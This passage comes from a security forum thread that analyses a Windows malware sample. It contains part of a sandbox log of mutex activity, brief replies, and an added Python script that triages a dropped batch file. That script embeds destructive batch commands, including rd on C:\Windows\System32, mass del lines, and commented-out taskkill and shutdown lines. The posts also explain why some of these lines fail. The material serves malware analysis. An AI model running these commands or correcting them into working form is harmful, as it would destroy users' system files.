  <activity timestamp="2015-08-23T10:15:39.876Z" id="488273" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $75327c40!comodo_6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.879Z" id="488274" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $75326b9d!comodo_6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.881Z" id="488275" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $771903cc!comodo_6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.884Z" id="488277" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $7719054c!comodo_6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.886Z" id="488278" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $7718fbbc!comodo_6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.887Z" id="488279" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $7718f990!comodo_6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.888Z" id="488280" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $77190798!comodo_6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.890Z" id="488281" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $77191074" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.891Z" id="488282" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $7718ff70" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.893Z" id="488283" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $7718fea4" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.894Z" id="488284" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $771906f0" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.895Z" id="488285" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $77190fcc" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.897Z" id="488286" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $77190870" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.898Z" id="488287" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $771910ec" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.900Z" id="488288" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $771907e0" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.901Z" id="488289" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $771918bc" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.903Z" id="488290" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $77190690" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.904Z" id="488291" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $77190930" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.905Z" id="488292" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $7718ffa0" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.907Z" id="488293" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $7718fdc4" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.909Z" id="488294" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $771907b0" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.911Z" id="488295" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $771900b0" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.912Z" id="488296" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $7718fd60" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.914Z" id="488297" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $7718fbd4" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.917Z" id="488298" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $7718fdf4" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.919Z" id="488299" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $77190f84" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.920Z" id="488300" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $77190f6c" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.921Z" id="488301" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $77191c10" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.923Z" id="488302" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $7718f9dc" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.924Z" id="488303" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $771b3b9b" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.926Z" id="488304" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $730312c6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.927Z" id="488305" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $73032384" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.929Z" id="488306" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $76618a65" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.931Z" id="488307" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $7662434b" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.933Z" id="488308" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $7661b17d" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.934Z" id="488309" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $7661db98" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.936Z" id="488310" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $76619f84" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.939Z" id="488311" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $7661dced" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.941Z" id="488312" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $7661b238" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.943Z" id="488313" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $7662695f" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.945Z" id="488314" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $7661b422" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.949Z" id="488315" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $76626ade" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.950Z" id="488316" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $766182a9" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.952Z" id="488317" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $766279df" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.953Z" id="488318" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $76618a29" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.955Z" id="488319" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $7661d22e" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.956Z" id="488320" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $766410a0" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.959Z" id="488321" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $766410dc" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.961Z" id="488322" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $76635246" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.963Z" id="488323" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $7663cfca" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.964Z" id="488324" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $7665cb0c" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.966Z" id="488325" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $7663ce54" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.968Z" id="488326" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $7663f588" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.969Z" id="488327" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $766200d9" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.971Z" id="488328" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $766198fd" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.972Z" id="488329" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $7661ffe6" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.973Z" id="488330" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $7661d1cf" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.975Z" id="488331" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $76623961" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.976Z" id="488332" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $76620e94" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.982Z" id="488333" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $76625f53" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.984Z" id="488334" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $7558534a" isCreate="true" objectType="Mutex" />
  <activity timestamp="2015-08-23T10:15:39.985Z" id="488335" type="KernelObject" name="\Sessions\1\BaseNamedObjects\Mutex, mAH, Process $0000234c, API $75361e06" isCreate="true" objectType="Mutex" />
  </activities>
  <children />
  </process>
  </vscope>[/mw_shl_code]
微光丶
 Thread starter | Posted 2015-8-23 18:21:46 | Show all posts
电脑发烧友 posted on 2015-8-23 18:16
Ran it. Without the sandbox, it blocked one file in the D: root directory and that was it.

Come to think of it, I think the batch command it dropped is written wrong. It should be rd /s /q C:\Windows\System32; with /f it does nothing at all. Not that it would help much anyway, it could only delete some of the files - -
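The post above points out that the dropped batch file uses an invalid `rd` switch. As an added example (not code from the thread or from the sample), the script below does a static triage of such a dropped .bat file: it flags destructive commands and the cmd.exe syntax mistakes that decide whether a line actually does anything. The input is a constructed reconstruction modelled on the tmp68851.bat quoted earlier in the thread (the OP says some lines were masked, so it is not the full file), and `triage`, `triage_line` and `live_destructive` are names chosen here, not anything from the sample.

```python
"""Static triage of a batch file dropped to %TEMP%.

Flags destructive commands and the cmd.exe syntax mistakes seen in this
kind of sample (C-style '//' comments, invalid rd switches, unbalanced
quotes) that decide whether a line has any effect when it runs.
"""

# Constructed input modelled on the tmp68851.bat quoted in this thread.
# It is a reconstruction for the example, not the original file bytes.
SAMPLE_BAT = r"""@echo off
set ztmp=C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\ytmp
set bfcec=tmp42711.exe
//start
start
@echo off
rd /S /F C:\Windows\System32
del /S /F "exe
del /S /F "mp3
//taskkill /f /im "explorer.exe"
//shutdown -s -f -t 60 -c "Pene tieso y flacido al mismo tiempo"
"""

DESTRUCTIVE = {"rd", "rmdir", "del", "erase", "format", "shutdown", "taskkill"}
# cmd.exe's rd/rmdir accepts only /S and /Q; any other switch aborts the command.
RD_SWITCHES = {"/S", "/Q"}


def triage_line(raw):
    """Describe one batch line: command word, applicable tags, and whether
    the line would have any effect as written. Returns None for blank lines."""
    line = raw.strip()
    if not line:
        return None
    tags = []
    if line.startswith("//"):
        # '//' is not a comment in cmd.exe ('rem' or '::' are). cmd looks for a
        # program literally named '//taskkill', fails with 'not recognized',
        # and the command the author meant to disable never runs anyway.
        tags.append("not-a-comment")
        line = line[2:]
    parts = line.split()
    cmd = parts[0].lstrip("@").lower()
    args = parts[1:]
    if cmd in DESTRUCTIVE:
        tags.append("destructive")
    if cmd in ("rd", "rmdir"):
        bad = [a for a in args if a.startswith("/") and a.upper() not in RD_SWITCHES]
        if bad:
            # 'rd /S /F ...' prints 'Invalid switch - "F".' and removes nothing.
            tags.append("invalid-switch:" + ",".join(bad))
    if line.count('"') % 2:
        # del /S /F "exe  -> the stray quote is stripped and the target is the
        # literal name 'exe', not *.exe, so the intended mass delete misfires.
        tags.append("unbalanced-quote")
    effective = ("not-a-comment" not in tags
                 and not any(t.startswith("invalid-switch") for t in tags))
    return {"cmd": cmd, "tags": tags, "effective": effective, "raw": raw}


def triage(text):
    """Triage every line of a batch file, numbering lines from 1."""
    results = []
    for n, raw in enumerate(text.splitlines(), 1):
        r = triage_line(raw)
        if r is not None:
            r["line"] = n
            results.append(r)
    return results


def live_destructive(text):
    """Destructive commands that would actually execute as written."""
    return [r for r in triage(text) if "destructive" in r["tags"] and r["effective"]]


if __name__ == "__main__":
    for r in triage(SAMPLE_BAT):
        if r["tags"]:
            state = "RUNS" if r["effective"] else "dead"
            print(f'{r["line"]:>3} {r["cmd"]:<9} {state:<4} {r["tags"]}')
```

On the constructed file this reports the `rd /S /F` line as dead (invalid switch, matching the observation in the post), the two `del` lines as the only destructive commands that actually run, and every `//`-prefixed line as a failed command rather than a comment. Checking the file against what the sandbox log shows is still necessary: static triage says what the script would do, not what the dropper did before or after writing it.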
微光丶
 Thread starter | Posted 2015-8-23 18:24:25 | Show all posts

Seems it isn't really destructive - -
Copyright © KaFan  KaFan.cn All Rights Reserved.